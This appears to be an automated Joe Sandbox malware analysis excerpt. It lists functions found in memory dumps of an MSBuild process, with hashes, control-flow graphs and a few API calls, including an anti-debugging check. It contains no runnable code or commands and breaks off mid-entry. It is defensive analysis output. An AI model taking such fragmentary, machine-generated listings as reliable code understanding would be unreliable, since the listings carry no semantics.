                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 19f4b45ecd3f83961791f83abcff87dcc298f3c0f6358b9fceafedcfbac93f70
                                                • Instruction ID: 82168554dd715228d6abd26b486af7f0ffcdca8a2976ef273c837744ee697cc7
                                                • Opcode Fuzzy Hash: 19f4b45ecd3f83961791f83abcff87dcc298f3c0f6358b9fceafedcfbac93f70
                                                • Instruction Fuzzy Hash: B62148B19002598FCB10CF9AD444BEEFBF4EF49320F14846AE458A3350D778A944CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E6690 Relevance: .8, Instructions: 814COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 983ce777d850689b63ccf14db8021db5fc0484aecd44dc40f4f921d152fd65fe
                                                • Instruction ID: f63c2aad205eb262f5b004fa15b76857e122f172be68c8c4f8aa508f3e46335d
                                                • Opcode Fuzzy Hash: 983ce777d850689b63ccf14db8021db5fc0484aecd44dc40f4f921d152fd65fe
                                                • Instruction Fuzzy Hash: 1D62AD34B012059FDB54DF68D594AAEBBF2EF88314F248469E805EB390DB35EC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EC228 Relevance: .6, Instructions: 637COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b4df892b353737232fa96f3df2298aef5ad522388d3dc88991bf45beed02c57
                                                • Instruction ID: 2f917800044d45e7889371c384a68636e1085f28e76447cb83bec1acc74b7e84
                                                • Opcode Fuzzy Hash: 1b4df892b353737232fa96f3df2298aef5ad522388d3dc88991bf45beed02c57
                                                • Instruction Fuzzy Hash: A9328F30B112099FDF54DF68D990AAEBBB2FB88310F108929D415EB395DB35EC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DDA550 Relevance: .6, Instructions: 621COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6964ac491903339bdad4df3b7527fa34a508ce75c9cfff6ca013da34ca5bd95b
                                                • Instruction ID: e3f193161d0df66c79b94826b51aeeceb5e7cb23de601b62312dfb5c3ebe157d
                                                • Opcode Fuzzy Hash: 6964ac491903339bdad4df3b7527fa34a508ce75c9cfff6ca013da34ca5bd95b
                                                • Instruction Fuzzy Hash: C4326C75A006059FDB14DF68D984BADBBB2EF88310F24C569E809EB394DB35DC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E5640 Relevance: .6, Instructions: 589COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7b18e8f0e4edd86b6a758e7dd7eba8e2a3d34a83199da36b37795fd62fa325
                                                • Instruction ID: a12159a9d1ffa797aa73fbb2b379be4a6d3aed4264e20f8706744a0bee046347
                                                • Opcode Fuzzy Hash: 6c7b18e8f0e4edd86b6a758e7dd7eba8e2a3d34a83199da36b37795fd62fa325
                                                • Instruction Fuzzy Hash: C322F275F012159FDF60CF64C4946AEBBF2EF84328F20846AD44AAB354DA36DC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667C480 Relevance: .5, Instructions: 522COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95c4bd7d0c98879931ace238313795cc581302b09976e3398fb9833b3b6508c4
                                                • Instruction ID: a5b81f31f7d92a89f8fc93e0d88c10f56b314bd4c1f1d137026cb2c6b61b5d81
                                                • Opcode Fuzzy Hash: 95c4bd7d0c98879931ace238313795cc581302b09976e3398fb9833b3b6508c4
                                                • Instruction Fuzzy Hash: 4D5218B0525706CFD718CF28EA8E1D97FB1FF41324FA0A21AE5515B2A0DBB4694ACF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DD4AC0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 348df3410a150062d36dc002434227e9d34a02aeaa9b401712bf9c1f13bb9239
                                                • Instruction ID: bfe8dec76c06fdf304b19f0a96bfb6e22a3a897dbbd998f1abc3d147121dcc71
                                                • Opcode Fuzzy Hash: 348df3410a150062d36dc002434227e9d34a02aeaa9b401712bf9c1f13bb9239
                                                • Instruction Fuzzy Hash: 13B16C70E00609CFDB10CFA9D8957AEBBF2AF88318F148529D459EB394EB749C45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DD3EA8 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b941acb9bd1e85580d951f31abb1aaf050aabba94d2dea7e002558efb4af5afa
                                                • Instruction ID: 0a70520a341dfb1dab6a8d47219ae360b504c679761c7b582e9f8e92e3cdc305
                                                • Opcode Fuzzy Hash: b941acb9bd1e85580d951f31abb1aaf050aabba94d2dea7e002558efb4af5afa
                                                • Instruction Fuzzy Hash: 24912A70E00649DFDB14CFA9C9857AEBBF2AF88314F248129E419A7394EB749845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EAD70 Relevance: 10.4, Strings: 8, Instructions: 398COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 527 66ead70-66ead8e 528 66ead90-66ead93 527->528 529 66eaf8d-66eaf96 528->529 530 66ead99-66ead9c 528->530 531 66eaf9c-66eafa6 529->531 532 66eade9-66eadf2 529->532 533 66ead9e-66eada3 530->533 534 66eada6-66eada9 530->534 535 66eadf8-66eadfc 532->535 536 66eafa7-66eafde 532->536 533->534 537 66eadbd-66eadc0 534->537 538 66eadab-66eadb8 534->538 539 66eae01-66eae04 535->539 557 66eafe0-66eafe3 536->557 540 66eadc2-66eadc6 537->540 541 66eadd1-66eadd4 537->541 538->537 545 66eae06-66eae22 539->545 546 66eae27-66eae2a 539->546 540->531 542 66eadcc 540->542 543 66eadd6-66eaddf 541->543 544 66eade4-66eade7 541->544 542->541 543->544 544->532 544->539 545->546 550 66eae2c-66eae3f 546->550 551 66eae44-66eae46 546->551 550->551 552 66eae4d-66eae50 551->552 553 66eae48 551->553 552->528 556 66eae56-66eae7a 552->556 553->552 574 66eaf8a 556->574 575 66eae80-66eae8f 556->575 559 66eafe5-66eafe9 557->559 560 66eaff0-66eaff3 557->560 562 66eafeb 559->562 563 66eb041-66eb07c 559->563 564 66eb016-66eb019 560->564 565 66eaff5-66eb011 560->565 562->560 577 66eb26f-66eb282 563->577 578 66eb082-66eb08e 563->578 567 66eb01b-66eb025 564->567 568 66eb026-66eb029 564->568 565->564 571 66eb02b 568->571 572 66eb038-66eb03b 568->572 652 66eb02b call 66eb2c8 571->652 653 66eb02b call 66eb2d8 571->653 572->563 576 66eb2a4-66eb2a6 572->576 574->529 589 66eaea7-66eaee2 call 66e6640 575->589 590 66eae91-66eae97 575->590 580 66eb2ad-66eb2b0 576->580 581 66eb2a8 576->581 579 66eb284 577->579 587 66eb0ae-66eb0f2 578->587 588 66eb090-66eb0a9 578->588 579->576 580->557 585 66eb2b6-66eb2c0 580->585 581->580 583 66eb031-66eb033 583->572 606 66eb10e-66eb14d 587->606 607 66eb0f4-66eb106 587->607 588->579 604 66eaefa-66eaf11 589->604 605 66eaee4-66eaeea 589->605 591 66eae9b-66eae9d 590->591 592 66eae99 590->592 591->589 592->589 619 66eaf29-66eaf3a 604->619 620 66eaf13-66eaf19 604->620 608 66eaeee-66eaef0 605->608 609 66eaeec 605->609 613 66eb234-66eb249 606->613 614 66eb153-66eb22e call 66e6640 606->614 607->606 608->604 609->604 613->577 614->613 626 66eaf3c-66eaf42 619->626 627 66eaf52-66eaf83 619->627 621 66eaf1d-66eaf1f 620->621 622 66eaf1b 620->622 621->619 622->619 628 66eaf46-66eaf48 626->628 629 66eaf44 626->629 627->574 628->627 629->627 652->583 653->583
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-3823777903
                                                • Opcode ID: aa14459e4f45b17ad46395d485a9d97cf05ba4cba33f76a07865fb743ccd5a25
                                                • Instruction ID: 93634c76c4362ddea08d5eee5e1694b7d43a586a2b2211c7217ade9f4431ea3f
                                                • Opcode Fuzzy Hash: aa14459e4f45b17ad46395d485a9d97cf05ba4cba33f76a07865fb743ccd5a25
                                                • Instruction Fuzzy Hash: C6E16C30E1120A9FDF65DFA9D9906AEB7B2EF85300F208529D409EB354DB35EC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06673893 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1384 6673893-6673927 GetCurrentProcess 1388 6673930-6673964 GetCurrentThread 1384->1388 1389 6673929-667392f 1384->1389 1390 6673966-667396c 1388->1390 1391 667396d-66739a1 GetCurrentProcess 1388->1391 1389->1388 1390->1391 1393 66739a3-66739a9 1391->1393 1394 66739aa-66739c2 1391->1394 1393->1394 1405 66739c5 call 6673a68 1394->1405 1406 66739c5 call 6673e48 1394->1406 1407 66739c5 call 6673e58 1394->1407 1397 66739cb-66739fa GetCurrentThreadId 1398 6673a03-6673a65 1397->1398 1399 66739fc-6673a02 1397->1399 1399->1398 1405->1397 1406->1397 1407->1397
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06673916
                                                • GetCurrentThread.KERNEL32 ref: 06673953
                                                • GetCurrentProcess.KERNEL32 ref: 06673990
                                                • GetCurrentThreadId.KERNEL32 ref: 066739E9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 4e8fcb13f4b416ca820e50e1f0fa47aa4d01cf11cec812be37701ef7d9dab3ff
                                                • Instruction ID: 54bc6efc2962b6c2afdcc37ca3ae7ce5174c1a1f954bea6f5c8fe95b0f9bfe52
                                                • Opcode Fuzzy Hash: 4e8fcb13f4b416ca820e50e1f0fa47aa4d01cf11cec812be37701ef7d9dab3ff
                                                • Instruction Fuzzy Hash: A15166B0901249CFDB44DFA9D948B9EBBF1EB48304F20812AE459B7360DB349984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06673898 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1408 6673898-6673927 GetCurrentProcess 1412 6673930-6673964 GetCurrentThread 1408->1412 1413 6673929-667392f 1408->1413 1414 6673966-667396c 1412->1414 1415 667396d-66739a1 GetCurrentProcess 1412->1415 1413->1412 1414->1415 1417 66739a3-66739a9 1415->1417 1418 66739aa-66739c2 1415->1418 1417->1418 1429 66739c5 call 6673a68 1418->1429 1430 66739c5 call 6673e48 1418->1430 1431 66739c5 call 6673e58 1418->1431 1421 66739cb-66739fa GetCurrentThreadId 1422 6673a03-6673a65 1421->1422 1423 66739fc-6673a02 1421->1423 1423->1422 1429->1421 1430->1421 1431->1421
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06673916
                                                • GetCurrentThread.KERNEL32 ref: 06673953
                                                • GetCurrentProcess.KERNEL32 ref: 06673990
                                                • GetCurrentThreadId.KERNEL32 ref: 066739E9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 818fc8207db82665e5045836d64863158db3afc7accc9bf7ee2f28bfab68cfce
                                                • Instruction ID: d8f3f60e63e124c4dd9aa0fc0798beb0a79a8e981312141d8c3048ed9e8d77ff
                                                • Opcode Fuzzy Hash: 818fc8207db82665e5045836d64863158db3afc7accc9bf7ee2f28bfab68cfce
                                                • Instruction Fuzzy Hash: 7E5168B0901349CFDB44DFA9D948B9EBBF1EB48304F208119E459B7360EB359984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E91F0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1432 66e91f0-66e9215 1433 66e9217-66e921a 1432->1433 1434 66e921c-66e923b 1433->1434 1435 66e9240-66e9243 1433->1435 1434->1435 1436 66e9249-66e925e 1435->1436 1437 66e9b03-66e9b05 1435->1437 1444 66e9276-66e928c 1436->1444 1445 66e9260-66e9266 1436->1445 1438 66e9b0c-66e9b0f 1437->1438 1439 66e9b07 1437->1439 1438->1433 1441 66e9b15-66e9b1f 1438->1441 1439->1438 1449 66e9297-66e9299 1444->1449 1446 66e926a-66e926c 1445->1446 1447 66e9268 1445->1447 1446->1444 1447->1444 1450 66e929b-66e92a1 1449->1450 1451 66e92b1-66e9322 1449->1451 1452 66e92a5-66e92a7 1450->1452 1453 66e92a3 1450->1453 1462 66e934e-66e936a 1451->1462 1463 66e9324-66e9347 1451->1463 1452->1451 1453->1451 1468 66e936c-66e938f 1462->1468 1469 66e9396-66e93b1 1462->1469 1463->1462 1468->1469 1474 66e93dc-66e93f7 1469->1474 1475 66e93b3-66e93d5 1469->1475 1480 66e93f9-66e941b 1474->1480 1481 66e9422-66e942c 1474->1481 1475->1474 1480->1481 1482 66e942e-66e9437 1481->1482 1483 66e943c-66e94b6 1481->1483 1482->1441 1489 66e94b8-66e94d6 1483->1489 1490 66e9503-66e9518 1483->1490 1494 66e94d8-66e94e7 1489->1494 1495 66e94f2-66e9501 1489->1495 1490->1437 1494->1495 1495->1489 1495->1490
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: 399d07fe43f6978bf3d5b195c9a2c1bd0acaacd7a3c576e1360aec13a1c426f0
                                                • Instruction ID: bc257208e83a7d66cc817e5d8380a2d53a11346648f6ca111c122a4692cc4313
                                                • Opcode Fuzzy Hash: 399d07fe43f6978bf3d5b195c9a2c1bd0acaacd7a3c576e1360aec13a1c426f0
                                                • Instruction Fuzzy Hash: 57915B30B1121A9FDF54DF65D9507AEB3F6EFC9304F1085AAC409EB384EA74AC468B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066ECFF0 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1498 66ecff0-66ed00b 1499 66ed00d-66ed010 1498->1499 1500 66ed059-66ed05c 1499->1500 1501 66ed012-66ed054 1499->1501 1502 66ed05e-66ed0a0 1500->1502 1503 66ed0a5-66ed0a8 1500->1503 1501->1500 1502->1503 1505 66ed0aa-66ed0ac 1503->1505 1506 66ed0b7-66ed0ba 1503->1506 1510 66ed397-66ed3a0 1505->1510 1511 66ed0b2 1505->1511 1507 66ed0bc-66ed0d2 1506->1507 1508 66ed0d7-66ed0da 1506->1508 1507->1508 1512 66ed0dc-66ed11e 1508->1512 1513 66ed123-66ed126 1508->1513 1515 66ed3af-66ed3bb 1510->1515 1516 66ed3a2-66ed3a7 1510->1516 1511->1506 1512->1513 1520 66ed16f-66ed172 1513->1520 1521 66ed128-66ed137 1513->1521 1517 66ed4cc-66ed4d1 1515->1517 1518 66ed3c1-66ed3d5 1515->1518 1516->1515 1540 66ed4d9 1517->1540 1539 66ed3db-66ed3ed 1518->1539 1518->1540 1526 66ed1bb-66ed1be 1520->1526 1527 66ed174-66ed1b6 1520->1527 1523 66ed139-66ed13e 1521->1523 1524 66ed146-66ed152 1521->1524 1523->1524 1532 66eda0d-66eda46 1524->1532 1533 66ed158-66ed16a 1524->1533 1534 66ed207-66ed20a 1526->1534 1535 66ed1c0-66ed202 1526->1535 1527->1526 1573 66eda48-66eda4b 1532->1573 1533->1520 1537 66ed20c-66ed211 1534->1537 1538 66ed214-66ed217 1534->1538 1535->1534 1537->1538 1544 66ed219-66ed228 1538->1544 1545 66ed260-66ed263 1538->1545 1560 66ed3ef-66ed3f5 1539->1560 1561 66ed411-66ed413 1539->1561 1547 66ed4dc-66ed4e8 1540->1547 1551 66ed22a-66ed22f 1544->1551 1552 66ed237-66ed243 1544->1552 1555 66ed265-66ed267 1545->1555 1556 66ed272-66ed275 1545->1556 1547->1521 1554 66ed4ee-66ed7db 1547->1554 1551->1552 1552->1532 1563 66ed249-66ed25b 1552->1563 1712 66eda02-66eda0c 1554->1712 1713 66ed7e1-66ed7e7 1554->1713 1555->1540 1566 66ed26d 1555->1566 1556->1547 1567 66ed27b-66ed27e 1556->1567 1571 66ed3f9-66ed405 1560->1571 1572 66ed3f7 1560->1572 1574 66ed41d-66ed429 1561->1574 1563->1545 1566->1556 1568 66ed280-66ed29c 1567->1568 1569 66ed2a1-66ed2a4 1567->1569 1568->1569 1577 66ed2ed-66ed2f0 1569->1577 1578 66ed2a6-66ed2e8 1569->1578 1579 66ed407-66ed40f 1571->1579 1572->1579 1580 66eda6e-66eda71 1573->1580 1581 66eda4d-66eda69 1573->1581 1602 66ed42b-66ed435 1574->1602 1603 66ed437 1574->1603 1590 66ed339-66ed33c 1577->1590 1591 66ed2f2-66ed334 1577->1591 1578->1577 1579->1574 1587 66edaa4-66edaa7 1580->1587 1588 66eda73-66eda9f 1580->1588 1581->1580 1597 66edaa9 1587->1597 1598 66edab6-66edab8 1587->1598 1588->1587 1600 66ed33e-66ed380 1590->1600 1601 66ed385-66ed387 1590->1601 1591->1590 1759 66edaa9 call 66edb78 1597->1759 1760 66edaa9 call 66edb65 1597->1760 1609 66edabf-66edac2 1598->1609 1610 66edaba 1598->1610 1600->1601 1606 66ed38e-66ed391 1601->1606 1607 66ed389 1601->1607 1608 66ed43c-66ed43e 1602->1608 1603->1608 1606->1499 1606->1510 1607->1606 1608->1540 1613 66ed444-66ed460 call 66e6640 1608->1613 1609->1573 1619 66edac4-66edad3 1609->1619 1610->1609 1636 66ed46f-66ed47b 1613->1636 1637 66ed462-66ed467 1613->1637 1618 66edaaf-66edab1 1618->1598 1629 66edb3a-66edb4f 1619->1629 1630 66edad5-66edb38 call 66e6640 1619->1630 1642 66edb50 1629->1642 1630->1629 1636->1517 1641 66ed47d-66ed4ca 1636->1641 1637->1636 1641->1540 1642->1642 1714 66ed7e9-66ed7ee 1713->1714 1715 66ed7f6-66ed7ff 1713->1715 1714->1715 1715->1532 1716 66ed805-66ed818 1715->1716 1718 66ed81e-66ed824 1716->1718 1719 66ed9f2-66ed9fc 1716->1719 1720 66ed826-66ed82b 1718->1720 1721 66ed833-66ed83c 1718->1721 1719->1712 1719->1713 1720->1721 1721->1532 1722 66ed842-66ed863 1721->1722 1725 66ed865-66ed86a 1722->1725 1726 66ed872-66ed87b 1722->1726 1725->1726 1726->1532 1727 66ed881-66ed89e 1726->1727 1727->1719 1730 66ed8a4-66ed8aa 1727->1730 1730->1532 1731 66ed8b0-66ed8c9 1730->1731 1733 66ed8cf-66ed8f6 1731->1733 1734 66ed9e5-66ed9ec 1731->1734 1733->1532 1737 66ed8fc-66ed906 1733->1737 1734->1719 1734->1730 1737->1532 1738 66ed90c-66ed923 1737->1738 1740 66ed925-66ed930 1738->1740 1741 66ed932-66ed94d 1738->1741 1740->1741 1741->1734 1746 66ed953-66ed96c call 66e6640 1741->1746 1750 66ed96e-66ed973 1746->1750 1751 66ed97b-66ed984 1746->1751 1750->1751 1751->1532 1752 66ed98a-66ed9de 1751->1752 1752->1734 1759->1618 1760->1618
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q
                                                • API String ID: 0-831282457
                                                • Opcode ID: 4be107b01f145f9229710f5ba7f38009be22d745158489a6ed4e1f006b8fa79c
                                                • Instruction ID: 69627344796463ea9072cef24a7d880d45f55e2e5e2d3fede0f66a0188715a50
                                                • Opcode Fuzzy Hash: 4be107b01f145f9229710f5ba7f38009be22d745158489a6ed4e1f006b8fa79c
                                                • Instruction Fuzzy Hash: E6626430A5020A9FCB55EF68D690A5EB7F2FF84304F248969D0059F369DB71ED4ACB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E4C08 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1761 66e4c08-66e4c2c 1762 66e4c2e-66e4c31 1761->1762 1763 66e4c37-66e4d2f 1762->1763 1764 66e5310-66e5313 1762->1764 1784 66e4d35-66e4d7d 1763->1784 1785 66e4db2-66e4db9 1763->1785 1765 66e5334-66e5336 1764->1765 1766 66e5315-66e532f 1764->1766 1768 66e533d-66e5340 1765->1768 1769 66e5338 1765->1769 1766->1765 1768->1762 1771 66e5346-66e5353 1768->1771 1769->1768 1806 66e4d82 call 66e54c0 1784->1806 1807 66e4d82 call 66e54b1 1784->1807 1786 66e4dbf-66e4e2f 1785->1786 1787 66e4e3d-66e4e46 1785->1787 1804 66e4e3a 1786->1804 1805 66e4e31 1786->1805 1787->1771 1798 66e4d88-66e4da4 1801 66e4daf 1798->1801 1802 66e4da6 1798->1802 1801->1785 1802->1801 1804->1787 1805->1804 1806->1798 1807->1798
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$XPcq$\Ocq
                                                • API String ID: 0-3575482020
                                                • Opcode ID: 1a35c2510624ababc49c405a7efafb9f1034be581ccf7250b77094074c5904ee
                                                • Instruction ID: 9e5b5ac0592d0e142e15bbdeac58ec824cdaa24866068a6696a09aee3541e1eb
                                                • Opcode Fuzzy Hash: 1a35c2510624ababc49c405a7efafb9f1034be581ccf7250b77094074c5904ee
                                                • Instruction Fuzzy Hash: BB616170F002199FDF559FB9C8547AEBAF6FB88700F20842AE506AB394DE758C458B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E91E6 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2603 66e91e6-66e9215 2604 66e9217-66e921a 2603->2604 2605 66e921c-66e923b 2604->2605 2606 66e9240-66e9243 2604->2606 2605->2606 2607 66e9249-66e925e 2606->2607 2608 66e9b03-66e9b05 2606->2608 2615 66e9276-66e928c 2607->2615 2616 66e9260-66e9266 2607->2616 2609 66e9b0c-66e9b0f 2608->2609 2610 66e9b07 2608->2610 2609->2604 2612 66e9b15-66e9b1f 2609->2612 2610->2609 2620 66e9297-66e9299 2615->2620 2617 66e926a-66e926c 2616->2617 2618 66e9268 2616->2618 2617->2615 2618->2615 2621 66e929b-66e92a1 2620->2621 2622 66e92b1-66e9322 2620->2622 2623 66e92a5-66e92a7 2621->2623 2624 66e92a3 2621->2624 2633 66e934e-66e936a 2622->2633 2634 66e9324-66e9347 2622->2634 2623->2622 2624->2622 2639 66e936c-66e938f 2633->2639 2640 66e9396-66e93b1 2633->2640 2634->2633 2639->2640 2645 66e93dc-66e93f7 2640->2645 2646 66e93b3-66e93d5 2640->2646 2651 66e93f9-66e941b 2645->2651 2652 66e9422-66e942c 2645->2652 2646->2645 2651->2652 2653 66e942e-66e9437 2652->2653 2654 66e943c-66e94b6 2652->2654 2653->2612 2660 66e94b8-66e94d6 2654->2660 2661 66e9503-66e9518 2654->2661 2665 66e94d8-66e94e7 2660->2665 2666 66e94f2-66e9501 2660->2666 2661->2608 2665->2666 2666->2660 2666->2661
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: c62676783c6504abba21a8552977d30d055249746f170de41a45e81ac8d42062
                                                • Instruction ID: 6b7a94cdf7fea043bd69c1aff954e7243ed705d2381d9131180f8e92815bc5ef
                                                • Opcode Fuzzy Hash: c62676783c6504abba21a8552977d30d055249746f170de41a45e81ac8d42062
                                                • Instruction Fuzzy Hash: FD514D34B112169FDF54DF65D990B6EB3F6EFC8214F10856AC409EB384EA34EC428B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667BD98 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
